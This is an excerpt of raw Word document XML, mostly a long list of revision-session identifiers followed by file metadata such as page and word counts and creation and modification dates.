    <w:rsid w:val="00BD0EAC"/>
    <w:rsid w:val="00BD21D0"/>
    <w:rsid w:val="00BD26D7"/>
    <w:rsid w:val="00BD37EC"/>
    <w:rsid w:val="00BD41A1"/>
    <w:rsid w:val="00BD72A9"/>
    <w:rsid w:val="00BE1256"/>
    <w:rsid w:val="00BE197D"/>
    <w:rsid w:val="00BE3229"/>
    <w:rsid w:val="00BE3817"/>
    <w:rsid w:val="00BE3C62"/>
    <w:rsid w:val="00BE4E24"/>
    <w:rsid w:val="00BE5275"/>
    <w:rsid w:val="00BE6C07"/>
    <w:rsid w:val="00BE7041"/>
    <w:rsid w:val="00BF0546"/>
    <w:rsid w:val="00BF0D80"/>
    <w:rsid w:val="00BF11CB"/>
    <w:rsid w:val="00BF122B"/>
    <w:rsid w:val="00BF207C"/>
    <w:rsid w:val="00BF222D"/>
    <w:rsid w:val="00BF2CC8"/>
    <w:rsid w:val="00BF2CEC"/>
    <w:rsid w:val="00BF45A6"/>
    <w:rsid w:val="00BF4621"/>
    <w:rsid w:val="00BF542D"/>
    <w:rsid w:val="00BF5BB8"/>
    <w:rsid w:val="00BF6FA5"/>
    <w:rsid w:val="00BF7610"/>
    <w:rsid w:val="00BF7A9C"/>
    <w:rsid w:val="00BF7AA9"/>
    <w:rsid w:val="00BF7D4F"/>
    <w:rsid w:val="00BF7E78"/>
    <w:rsid w:val="00C01B86"/>
    <w:rsid w:val="00C025BD"/>
    <w:rsid w:val="00C033EE"/>
    <w:rsid w:val="00C05066"/>
    <w:rsid w:val="00C052CE"/>
    <w:rsid w:val="00C0609A"/>
    <w:rsid w:val="00C060DF"/>
    <w:rsid w:val="00C06886"/>
    <w:rsid w:val="00C103B8"/>
    <w:rsid w:val="00C11749"/>
    <w:rsid w:val="00C132A0"/>
    <w:rsid w:val="00C132E8"/>
    <w:rsid w:val="00C13A55"/>
    <w:rsid w:val="00C13F29"/>
    <w:rsid w:val="00C15D6D"/>
    <w:rsid w:val="00C15ED8"/>
    <w:rsid w:val="00C164C3"/>
    <w:rsid w:val="00C1714F"/>
    <w:rsid w:val="00C20140"/>
    <w:rsid w:val="00C203C5"/>
    <w:rsid w:val="00C2090C"/>
    <w:rsid w:val="00C20C7D"/>
    <w:rsid w:val="00C21B1F"/>
    <w:rsid w:val="00C23A83"/>
    <w:rsid w:val="00C23BD7"/>
    <w:rsid w:val="00C24586"/>
    <w:rsid w:val="00C30123"/>
    <w:rsid w:val="00C30322"/>
    <w:rsid w:val="00C30598"/>
    <w:rsid w:val="00C31359"/>
    <w:rsid w:val="00C3412C"/>
    <w:rsid w:val="00C35039"/>
    <w:rsid w:val="00C357D7"/>
    <w:rsid w:val="00C36495"/>
    <w:rsid w:val="00C36F03"/>
    <w:rsid w:val="00C410E9"/>
    <w:rsid w:val="00C41A17"/>
    <w:rsid w:val="00C42274"/>
    <w:rsid w:val="00C426D6"/>
    <w:rsid w:val="00C44601"/>
    <w:rsid w:val="00C45114"/>
    <w:rsid w:val="00C45834"/>
    <w:rsid w:val="00C45B55"/>
    <w:rsid w:val="00C46B3C"/>
    <w:rsid w:val="00C51580"/>
    <w:rsid w:val="00C526F2"/>
    <w:rsid w:val="00C527E8"/>
    <w:rsid w:val="00C5299F"/>
    <w:rsid w:val="00C53582"/>
    <w:rsid w:val="00C55268"/>
    <w:rsid w:val="00C55352"/>
    <w:rsid w:val="00C567B9"/>
    <w:rsid w:val="00C60EB3"/>
    <w:rsid w:val="00C62123"/>
    <w:rsid w:val="00C623C7"/>
    <w:rsid w:val="00C624AE"/>
    <w:rsid w:val="00C62587"/>
    <w:rsid w:val="00C62772"/>
    <w:rsid w:val="00C630B7"/>
    <w:rsid w:val="00C63922"/>
    <w:rsid w:val="00C647FB"/>
    <w:rsid w:val="00C672E2"/>
    <w:rsid w:val="00C72177"/>
    <w:rsid w:val="00C72723"/>
    <w:rsid w:val="00C75E38"/>
    <w:rsid w:val="00C76D83"/>
    <w:rsid w:val="00C76E4D"/>
    <w:rsid w:val="00C772AA"/>
    <w:rsid w:val="00C80300"/>
    <w:rsid w:val="00C819E2"/>
    <w:rsid w:val="00C81D0A"/>
    <w:rsid w:val="00C825F3"/>
    <w:rsid w:val="00C826E7"/>
    <w:rsid w:val="00C8285F"/>
    <w:rsid w:val="00C8363F"/>
    <w:rsid w:val="00C8399A"/>
    <w:rsid w:val="00C868B0"/>
    <w:rsid w:val="00C86F5F"/>
    <w:rsid w:val="00C87885"/>
    <w:rsid w:val="00C87957"/>
    <w:rsid w:val="00C91ED1"/>
    <w:rsid w:val="00C929D4"/>
    <w:rsid w:val="00C94277"/>
    <w:rsid w:val="00C946ED"/>
    <w:rsid w:val="00C952EC"/>
    <w:rsid w:val="00C9536C"/>
    <w:rsid w:val="00C955A9"/>
    <w:rsid w:val="00C97B7E"/>
    <w:rsid w:val="00CA0401"/>
    <w:rsid w:val="00CA0CC6"/>
    <w:rsid w:val="00CA0CF5"/>
    <w:rsid w:val="00CA255E"/>
    <w:rsid w:val="00CA26C3"/>
    <w:rsid w:val="00CA2AAB"/>
    <w:rsid w:val="00CA4093"/>
    <w:rsid w:val="00CA4700"/>
    <w:rsid w:val="00CA5768"/>
    <w:rsid w:val="00CA6282"/>
    <w:rsid w:val="00CA763E"/>
    <w:rsid w:val="00CB064F"/>
    <w:rsid w:val="00CB0BEC"/>
    <w:rsid w:val="00CB0F09"/>
    <w:rsid w:val="00CB2E2F"/>
    <w:rsid w:val="00CB3968"/>
    <w:rsid w:val="00CB4A9D"/>
    <w:rsid w:val="00CB7A99"/>
    <w:rsid w:val="00CC02C9"/>
    <w:rsid w:val="00CC097E"/>
    <w:rsid w:val="00CC12DB"/>
    <w:rsid w:val="00CC2128"/>
    <w:rsid w:val="00CC21E5"/>
    <w:rsid w:val="00CC2DC3"/>
    <w:rsid w:val="00CC37BA"/>
    <w:rsid w:val="00CC6FC1"/>
    <w:rsid w:val="00CC76EE"/>
    <w:rsid w:val="00CD04C7"/>
    <w:rsid w:val="00CD1539"/>
    <w:rsid w:val="00CD1759"/>
    <w:rsid w:val="00CD2729"/>
    <w:rsid w:val="00CD33CB"/>
    <w:rsid w:val="00CD4256"/>
    <w:rsid w:val="00CD5DFC"/>
    <w:rsid w:val="00CD6281"/>
    <w:rsid w:val="00CD7D37"/>
    <w:rsid w:val="00CD7F56"/>
    <w:rsid w:val="00CE0311"/>
    <w:rsid w:val="00CE0BBA"/>
    <w:rsid w:val="00CE108D"/>
    <w:rsid w:val="00CE1C3B"/>
    <w:rsid w:val="00CE4469"/>
    <w:rsid w:val="00CE4956"/>
    <w:rsid w:val="00CE502F"/>
    <w:rsid w:val="00CE5463"/>
    <w:rsid w:val="00CE6589"/>
    <w:rsid w:val="00CF00AD"/>
    <w:rsid w:val="00CF0570"/>
    <w:rsid w:val="00CF0DDE"/>
    <w:rsid w:val="00CF2723"/>
    <w:rsid w:val="00CF2964"/>
    <w:rsid w:val="00CF2F7C"/>
    <w:rsid w:val="00CF394A"/>
    <w:rsid w:val="00CF4139"/>
    <w:rsid w:val="00CF4D7A"/>
    <w:rsid w:val="00CF5E90"/>
    <w:rsid w:val="00CF5FAB"/>
    <w:rsid w:val="00CF621C"/>
    <w:rsid w:val="00CF6427"/>
    <w:rsid w:val="00CF7310"/>
    <w:rsid w:val="00D01128"/>
    <w:rsid w:val="00D018FD"/>
    <w:rsid w:val="00D041F2"/>
    <w:rsid w:val="00D0445A"/>
    <w:rsid w:val="00D04992"/>
    <w:rsid w:val="00D05CF2"/>
    <w:rsid w:val="00D060D0"/>
    <w:rsid w:val="00D0614E"/>
    <w:rsid w:val="00D072CE"/>
    <w:rsid w:val="00D0764E"/>
    <w:rsid w:val="00D125AE"/>
    <w:rsid w:val="00D13AE6"/>
    <w:rsid w:val="00D1454A"/>
    <w:rsid w:val="00D17194"/>
    <w:rsid w:val="00D17385"/>
    <w:rsid w:val="00D1751D"/>
    <w:rsid w:val="00D208E8"/>
    <w:rsid w:val="00D210FF"/>
    <w:rsid w:val="00D212D2"/>
    <w:rsid w:val="00D21F27"/>
    <w:rsid w:val="00D22AC0"/>
    <w:rsid w:val="00D23435"/>
    <w:rsid w:val="00D23F76"/>
    <w:rsid w:val="00D2486E"/>
    <w:rsid w:val="00D258C9"/>
    <w:rsid w:val="00D259BE"/>
    <w:rsid w:val="00D26A52"/>
    <w:rsid w:val="00D27AD6"/>
    <w:rsid w:val="00D315D9"/>
    <w:rsid w:val="00D31680"/>
    <w:rsid w:val="00D316C0"/>
    <w:rsid w:val="00D31DD4"/>
    <w:rsid w:val="00D31F74"/>
    <w:rsid w:val="00D32AE1"/>
    <w:rsid w:val="00D331D1"/>
    <w:rsid w:val="00D33B36"/>
    <w:rsid w:val="00D3605A"/>
    <w:rsid w:val="00D36700"/>
    <w:rsid w:val="00D36B22"/>
    <w:rsid w:val="00D36BE5"/>
    <w:rsid w:val="00D371E9"/>
    <w:rsid w:val="00D41838"/>
    <w:rsid w:val="00D41C73"/>
    <w:rsid w:val="00D4239E"/>
    <w:rsid w:val="00D427D0"/>
    <w:rsid w:val="00D43383"/>
    <w:rsid w:val="00D4433E"/>
    <w:rsid w:val="00D44C08"/>
    <w:rsid w:val="00D45564"/>
    <w:rsid w:val="00D46084"/>
    <w:rsid w:val="00D46193"/>
    <w:rsid w:val="00D5091A"/>
    <w:rsid w:val="00D50C24"/>
    <w:rsid w:val="00D51283"/>
    <w:rsid w:val="00D53221"/>
    <w:rsid w:val="00D53DA2"/>
    <w:rsid w:val="00D541E4"/>
    <w:rsid w:val="00D56607"/>
    <w:rsid w:val="00D56C1E"/>
    <w:rsid w:val="00D60042"/>
    <w:rsid w:val="00D60B10"/>
    <w:rsid w:val="00D62530"/>
    <w:rsid w:val="00D62662"/>
    <w:rsid w:val="00D62D2B"/>
    <w:rsid w:val="00D63DB2"/>
    <w:rsid w:val="00D657DC"/>
    <w:rsid w:val="00D658E1"/>
    <w:rsid w:val="00D65C88"/>
    <w:rsid w:val="00D65F75"/>
    <w:rsid w:val="00D67623"/>
    <w:rsid w:val="00D67CA6"/>
    <w:rsid w:val="00D71AEE"/>
    <w:rsid w:val="00D71AFB"/>
    <w:rsid w:val="00D72232"/>
    <w:rsid w:val="00D7273E"/>
    <w:rsid w:val="00D727D8"/>
    <w:rsid w:val="00D73146"/>
    <w:rsid w:val="00D735F0"/>
    <w:rsid w:val="00D75A3A"/>
    <w:rsid w:val="00D808BC"/>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2658"/>
    <w:rsid w:val="00D92974"/>
    <w:rsid w:val="00D92C19"/>
    <w:rsid w:val="00D93C18"/>
    <w:rsid w:val="00D93DF1"/>
    <w:rsid w:val="00D9486D"/>
    <w:rsid w:val="00D94AAD"/>
    <w:rsid w:val="00D95FF1"/>
    <w:rsid w:val="00D972A3"/>
    <w:rsid w:val="00DA31A2"/>
    <w:rsid w:val="00DA34E3"/>
    <w:rsid w:val="00DA39BA"/>
    <w:rsid w:val="00DA402C"/>
    <w:rsid w:val="00DA4429"/>
    <w:rsid w:val="00DA4F64"/>
    <w:rsid w:val="00DA5207"/>
    <w:rsid w:val="00DA69C2"/>
    <w:rsid w:val="00DA6C1D"/>
    <w:rsid w:val="00DA6D19"/>
    <w:rsid w:val="00DB074F"/>
    <w:rsid w:val="00DB0A87"/>
    <w:rsid w:val="00DB1113"/>
    <w:rsid w:val="00DB1578"/>
    <w:rsid w:val="00DB2336"/>
    <w:rsid w:val="00DB25EA"/>
    <w:rsid w:val="00DB2CCA"/>
    <w:rsid w:val="00DB2D53"/>
    <w:rsid w:val="00DB376E"/>
    <w:rsid w:val="00DB5350"/>
    <w:rsid w:val="00DB5860"/>
    <w:rsid w:val="00DB5DB0"/>
    <w:rsid w:val="00DB7333"/>
    <w:rsid w:val="00DC087D"/>
    <w:rsid w:val="00DC2191"/>
    <w:rsid w:val="00DC2783"/>
    <w:rsid w:val="00DC37B4"/>
    <w:rsid w:val="00DC3A31"/>
    <w:rsid w:val="00DC4262"/>
    <w:rsid w:val="00DC4974"/>
    <w:rsid w:val="00DC6791"/>
    <w:rsid w:val="00DC6D46"/>
    <w:rsid w:val="00DD14CB"/>
    <w:rsid w:val="00DD27F5"/>
    <w:rsid w:val="00DD2A86"/>
    <w:rsid w:val="00DD2D6C"/>
    <w:rsid w:val="00DD2D6F"/>
    <w:rsid w:val="00DD31D7"/>
    <w:rsid w:val="00DD3D38"/>
    <w:rsid w:val="00DD4659"/>
    <w:rsid w:val="00DD7BE3"/>
    <w:rsid w:val="00DD7F6C"/>
    <w:rsid w:val="00DE0B74"/>
    <w:rsid w:val="00DE12DD"/>
    <w:rsid w:val="00DE2FC0"/>
    <w:rsid w:val="00DE6548"/>
    <w:rsid w:val="00DE6D21"/>
    <w:rsid w:val="00DE793A"/>
    <w:rsid w:val="00DF084F"/>
    <w:rsid w:val="00DF3AFB"/>
    <w:rsid w:val="00DF3B4D"/>
    <w:rsid w:val="00DF3D7B"/>
    <w:rsid w:val="00DF51C0"/>
    <w:rsid w:val="00DF51D1"/>
    <w:rsid w:val="00DF5711"/>
    <w:rsid w:val="00DF6922"/>
    <w:rsid w:val="00E013EC"/>
    <w:rsid w:val="00E0208D"/>
    <w:rsid w:val="00E02330"/>
    <w:rsid w:val="00E02388"/>
    <w:rsid w:val="00E03778"/>
    <w:rsid w:val="00E04FD4"/>
    <w:rsid w:val="00E05143"/>
    <w:rsid w:val="00E064A7"/>
    <w:rsid w:val="00E07033"/>
    <w:rsid w:val="00E07162"/>
    <w:rsid w:val="00E105F6"/>
    <w:rsid w:val="00E10C51"/>
    <w:rsid w:val="00E10C53"/>
    <w:rsid w:val="00E11113"/>
    <w:rsid w:val="00E11269"/>
    <w:rsid w:val="00E11372"/>
    <w:rsid w:val="00E11705"/>
    <w:rsid w:val="00E11CDF"/>
    <w:rsid w:val="00E12124"/>
    <w:rsid w:val="00E13DE7"/>
    <w:rsid w:val="00E15B7C"/>
    <w:rsid w:val="00E1615D"/>
    <w:rsid w:val="00E16BBA"/>
    <w:rsid w:val="00E1728D"/>
    <w:rsid w:val="00E17D71"/>
    <w:rsid w:val="00E17F16"/>
    <w:rsid w:val="00E2019D"/>
    <w:rsid w:val="00E211F2"/>
    <w:rsid w:val="00E213CC"/>
    <w:rsid w:val="00E23750"/>
    <w:rsid w:val="00E238E2"/>
    <w:rsid w:val="00E23E40"/>
    <w:rsid w:val="00E24958"/>
    <w:rsid w:val="00E261FB"/>
    <w:rsid w:val="00E26292"/>
    <w:rsid w:val="00E30465"/>
    <w:rsid w:val="00E304F6"/>
    <w:rsid w:val="00E30E77"/>
    <w:rsid w:val="00E322B3"/>
    <w:rsid w:val="00E33A9C"/>
    <w:rsid w:val="00E33E4C"/>
    <w:rsid w:val="00E35956"/>
    <w:rsid w:val="00E402AA"/>
    <w:rsid w:val="00E406A0"/>
    <w:rsid w:val="00E409F7"/>
    <w:rsid w:val="00E41867"/>
    <w:rsid w:val="00E42677"/>
    <w:rsid w:val="00E42939"/>
    <w:rsid w:val="00E43349"/>
    <w:rsid w:val="00E43672"/>
    <w:rsid w:val="00E43858"/>
    <w:rsid w:val="00E43E84"/>
    <w:rsid w:val="00E44F77"/>
    <w:rsid w:val="00E46FFD"/>
    <w:rsid w:val="00E47E25"/>
    <w:rsid w:val="00E5013B"/>
    <w:rsid w:val="00E509A6"/>
    <w:rsid w:val="00E50C35"/>
    <w:rsid w:val="00E50EFF"/>
    <w:rsid w:val="00E57060"/>
    <w:rsid w:val="00E575E1"/>
    <w:rsid w:val="00E57B4F"/>
    <w:rsid w:val="00E60591"/>
    <w:rsid w:val="00E6134D"/>
    <w:rsid w:val="00E61CA0"/>
    <w:rsid w:val="00E63285"/>
    <w:rsid w:val="00E634DC"/>
    <w:rsid w:val="00E650AD"/>
    <w:rsid w:val="00E65477"/>
    <w:rsid w:val="00E654F6"/>
    <w:rsid w:val="00E65591"/>
    <w:rsid w:val="00E6595E"/>
    <w:rsid w:val="00E65A7A"/>
    <w:rsid w:val="00E65B79"/>
    <w:rsid w:val="00E666B3"/>
    <w:rsid w:val="00E669D0"/>
    <w:rsid w:val="00E66FAB"/>
    <w:rsid w:val="00E71696"/>
    <w:rsid w:val="00E72F1B"/>
    <w:rsid w:val="00E748CE"/>
    <w:rsid w:val="00E74F1C"/>
    <w:rsid w:val="00E767A0"/>
    <w:rsid w:val="00E76A30"/>
    <w:rsid w:val="00E77D09"/>
    <w:rsid w:val="00E81641"/>
    <w:rsid w:val="00E81680"/>
    <w:rsid w:val="00E8268A"/>
    <w:rsid w:val="00E83DE4"/>
    <w:rsid w:val="00E85A03"/>
    <w:rsid w:val="00E85D1D"/>
    <w:rsid w:val="00E90304"/>
    <w:rsid w:val="00E90502"/>
    <w:rsid w:val="00E90620"/>
    <w:rsid w:val="00E91170"/>
    <w:rsid w:val="00E91292"/>
    <w:rsid w:val="00E91521"/>
    <w:rsid w:val="00E92021"/>
    <w:rsid w:val="00E92E7E"/>
    <w:rsid w:val="00E932F8"/>
    <w:rsid w:val="00E93453"/>
    <w:rsid w:val="00E93A2A"/>
    <w:rsid w:val="00E94A7C"/>
    <w:rsid w:val="00E9503B"/>
    <w:rsid w:val="00E95CA2"/>
    <w:rsid w:val="00E95EFC"/>
    <w:rsid w:val="00E96514"/>
    <w:rsid w:val="00EA0382"/>
    <w:rsid w:val="00EA0652"/>
    <w:rsid w:val="00EA1834"/>
    <w:rsid w:val="00EA5B7B"/>
    <w:rsid w:val="00EB01F0"/>
    <w:rsid w:val="00EB205E"/>
    <w:rsid w:val="00EB240D"/>
    <w:rsid w:val="00EB2F1C"/>
    <w:rsid w:val="00EB3803"/>
    <w:rsid w:val="00EB38A5"/>
    <w:rsid w:val="00EB3EF8"/>
    <w:rsid w:val="00EB4CE8"/>
    <w:rsid w:val="00EB591A"/>
    <w:rsid w:val="00EB5FB4"/>
    <w:rsid w:val="00EB6633"/>
    <w:rsid w:val="00EB685C"/>
    <w:rsid w:val="00EC0081"/>
    <w:rsid w:val="00EC01DE"/>
    <w:rsid w:val="00EC056D"/>
    <w:rsid w:val="00EC16E0"/>
    <w:rsid w:val="00EC1E6E"/>
    <w:rsid w:val="00EC1E71"/>
    <w:rsid w:val="00EC27C0"/>
    <w:rsid w:val="00EC29DE"/>
    <w:rsid w:val="00EC4BDF"/>
    <w:rsid w:val="00EC5383"/>
    <w:rsid w:val="00EC551D"/>
    <w:rsid w:val="00EC5F85"/>
    <w:rsid w:val="00EC71B4"/>
    <w:rsid w:val="00ED0F0B"/>
    <w:rsid w:val="00ED0F95"/>
    <w:rsid w:val="00ED14FF"/>
    <w:rsid w:val="00ED15AE"/>
    <w:rsid w:val="00ED175D"/>
    <w:rsid w:val="00ED1C86"/>
    <w:rsid w:val="00ED2D2F"/>
    <w:rsid w:val="00ED45D6"/>
    <w:rsid w:val="00ED5491"/>
    <w:rsid w:val="00ED6993"/>
    <w:rsid w:val="00ED6B61"/>
    <w:rsid w:val="00ED6CBE"/>
    <w:rsid w:val="00ED7BA5"/>
    <w:rsid w:val="00EE01CB"/>
    <w:rsid w:val="00EE02F6"/>
    <w:rsid w:val="00EE0387"/>
    <w:rsid w:val="00EE0E80"/>
    <w:rsid w:val="00EE1174"/>
    <w:rsid w:val="00EE1F26"/>
    <w:rsid w:val="00EE3149"/>
    <w:rsid w:val="00EE3361"/>
    <w:rsid w:val="00EE3663"/>
    <w:rsid w:val="00EE3A78"/>
    <w:rsid w:val="00EE3BC8"/>
    <w:rsid w:val="00EE3FAA"/>
    <w:rsid w:val="00EE458F"/>
    <w:rsid w:val="00EE4AA8"/>
    <w:rsid w:val="00EE5605"/>
    <w:rsid w:val="00EE6263"/>
    <w:rsid w:val="00EE682A"/>
    <w:rsid w:val="00EE7A74"/>
    <w:rsid w:val="00EF02AF"/>
    <w:rsid w:val="00EF2A05"/>
    <w:rsid w:val="00EF34A7"/>
    <w:rsid w:val="00EF350A"/>
    <w:rsid w:val="00EF3D81"/>
    <w:rsid w:val="00EF58C4"/>
    <w:rsid w:val="00EF6038"/>
    <w:rsid w:val="00EF6A92"/>
    <w:rsid w:val="00EF70CC"/>
    <w:rsid w:val="00EF7F75"/>
    <w:rsid w:val="00F0015F"/>
    <w:rsid w:val="00F0030F"/>
    <w:rsid w:val="00F01904"/>
    <w:rsid w:val="00F022B7"/>
    <w:rsid w:val="00F024BD"/>
    <w:rsid w:val="00F02DD6"/>
    <w:rsid w:val="00F039ED"/>
    <w:rsid w:val="00F04AEE"/>
    <w:rsid w:val="00F04C75"/>
    <w:rsid w:val="00F058E0"/>
    <w:rsid w:val="00F0672F"/>
    <w:rsid w:val="00F07C1D"/>
    <w:rsid w:val="00F1018A"/>
    <w:rsid w:val="00F10361"/>
    <w:rsid w:val="00F10747"/>
    <w:rsid w:val="00F10852"/>
    <w:rsid w:val="00F11416"/>
    <w:rsid w:val="00F117E1"/>
    <w:rsid w:val="00F12C94"/>
    <w:rsid w:val="00F14135"/>
    <w:rsid w:val="00F1571C"/>
    <w:rsid w:val="00F15AEA"/>
    <w:rsid w:val="00F200BB"/>
    <w:rsid w:val="00F207B7"/>
    <w:rsid w:val="00F20826"/>
    <w:rsid w:val="00F217A8"/>
    <w:rsid w:val="00F22C23"/>
    <w:rsid w:val="00F234B7"/>
    <w:rsid w:val="00F23D36"/>
    <w:rsid w:val="00F24155"/>
    <w:rsid w:val="00F24373"/>
    <w:rsid w:val="00F2478F"/>
    <w:rsid w:val="00F24B63"/>
    <w:rsid w:val="00F25477"/>
    <w:rsid w:val="00F256F0"/>
    <w:rsid w:val="00F257C6"/>
    <w:rsid w:val="00F26E2E"/>
    <w:rsid w:val="00F2706B"/>
    <w:rsid w:val="00F302AB"/>
    <w:rsid w:val="00F32393"/>
    <w:rsid w:val="00F32F8C"/>
    <w:rsid w:val="00F33170"/>
    <w:rsid w:val="00F33BA9"/>
    <w:rsid w:val="00F345A8"/>
    <w:rsid w:val="00F35C38"/>
    <w:rsid w:val="00F3610F"/>
    <w:rsid w:val="00F36F1E"/>
    <w:rsid w:val="00F3705F"/>
    <w:rsid w:val="00F370F4"/>
    <w:rsid w:val="00F418E5"/>
    <w:rsid w:val="00F41C8A"/>
    <w:rsid w:val="00F4302C"/>
    <w:rsid w:val="00F45D80"/>
    <w:rsid w:val="00F468B5"/>
    <w:rsid w:val="00F4692D"/>
    <w:rsid w:val="00F50EBA"/>
    <w:rsid w:val="00F5101F"/>
    <w:rsid w:val="00F5170B"/>
    <w:rsid w:val="00F51953"/>
    <w:rsid w:val="00F51D91"/>
    <w:rsid w:val="00F51DC0"/>
    <w:rsid w:val="00F53F54"/>
    <w:rsid w:val="00F5469A"/>
    <w:rsid w:val="00F55002"/>
    <w:rsid w:val="00F569CF"/>
    <w:rsid w:val="00F56E05"/>
    <w:rsid w:val="00F57856"/>
    <w:rsid w:val="00F607D0"/>
    <w:rsid w:val="00F60998"/>
    <w:rsid w:val="00F61476"/>
    <w:rsid w:val="00F61D9D"/>
    <w:rsid w:val="00F6310E"/>
    <w:rsid w:val="00F642E5"/>
    <w:rsid w:val="00F6461F"/>
    <w:rsid w:val="00F64C64"/>
    <w:rsid w:val="00F64D11"/>
    <w:rsid w:val="00F654C8"/>
    <w:rsid w:val="00F657B6"/>
    <w:rsid w:val="00F66579"/>
    <w:rsid w:val="00F67F2F"/>
    <w:rsid w:val="00F70742"/>
    <w:rsid w:val="00F71C1D"/>
    <w:rsid w:val="00F728AA"/>
    <w:rsid w:val="00F73030"/>
    <w:rsid w:val="00F734AE"/>
    <w:rsid w:val="00F73B00"/>
    <w:rsid w:val="00F747B8"/>
    <w:rsid w:val="00F7505D"/>
    <w:rsid w:val="00F757C0"/>
    <w:rsid w:val="00F7696E"/>
    <w:rsid w:val="00F77210"/>
    <w:rsid w:val="00F80BCC"/>
    <w:rsid w:val="00F80D20"/>
    <w:rsid w:val="00F80E84"/>
    <w:rsid w:val="00F81007"/>
    <w:rsid w:val="00F819D3"/>
    <w:rsid w:val="00F82AF0"/>
    <w:rsid w:val="00F8414D"/>
    <w:rsid w:val="00F841E2"/>
    <w:rsid w:val="00F854FB"/>
    <w:rsid w:val="00F85E4C"/>
    <w:rsid w:val="00F8765E"/>
    <w:rsid w:val="00F9226F"/>
    <w:rsid w:val="00F93141"/>
    <w:rsid w:val="00F9541D"/>
    <w:rsid w:val="00F95D28"/>
    <w:rsid w:val="00F97F44"/>
    <w:rsid w:val="00FA0624"/>
    <w:rsid w:val="00FA08A8"/>
    <w:rsid w:val="00FA0CBC"/>
    <w:rsid w:val="00FA186B"/>
    <w:rsid w:val="00FA1D08"/>
    <w:rsid w:val="00FA3184"/>
    <w:rsid w:val="00FA33BE"/>
    <w:rsid w:val="00FA45B1"/>
    <w:rsid w:val="00FA5A5B"/>
    <w:rsid w:val="00FA5E46"/>
    <w:rsid w:val="00FB06A8"/>
    <w:rsid w:val="00FB26DF"/>
    <w:rsid w:val="00FB3AFF"/>
    <w:rsid w:val="00FB3EBE"/>
    <w:rsid w:val="00FB4E3B"/>
    <w:rsid w:val="00FB4ED7"/>
    <w:rsid w:val="00FB5631"/>
    <w:rsid w:val="00FB5799"/>
    <w:rsid w:val="00FB5EA7"/>
    <w:rsid w:val="00FB7743"/>
    <w:rsid w:val="00FC0B48"/>
    <w:rsid w:val="00FC43DA"/>
    <w:rsid w:val="00FC693C"/>
    <w:rsid w:val="00FC70C6"/>
    <w:rsid w:val="00FD05D2"/>
    <w:rsid w:val="00FD2185"/>
    <w:rsid w:val="00FD2718"/>
    <w:rsid w:val="00FD366E"/>
    <w:rsid w:val="00FD3BA9"/>
    <w:rsid w:val="00FD3DE0"/>
    <w:rsid w:val="00FD51B3"/>
    <w:rsid w:val="00FD548B"/>
    <w:rsid w:val="00FD642F"/>
    <w:rsid w:val="00FD6890"/>
    <w:rsid w:val="00FD7211"/>
    <w:rsid w:val="00FD7AE4"/>
    <w:rsid w:val="00FE0219"/>
    <w:rsid w:val="00FE14E9"/>
    <w:rsid w:val="00FE1FD2"/>
    <w:rsid w:val="00FE218F"/>
    <w:rsid w:val="00FE2A16"/>
    <w:rsid w:val="00FE3514"/>
    <w:rsid w:val="00FE3CA3"/>
    <w:rsid w:val="00FE3EA0"/>
    <w:rsid w:val="00FE4904"/>
    <w:rsid w:val="00FE4B43"/>
    <w:rsid w:val="00FE528C"/>
    <w:rsid w:val="00FE602E"/>
    <w:rsid w:val="00FE6490"/>
    <w:rsid w:val="00FF0566"/>
    <w:rsid w:val="00FF0644"/>
    <w:rsid w:val="00FF5ECE"/>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95</Pages>
  <Words>22383</Words>
  <Characters>138553</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6024</Lines>
  <Paragraphs>3925</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157011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2684</cp:revision>
  <cp:lastPrinted>2026-08-27T06:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-27T05:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-07T19:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>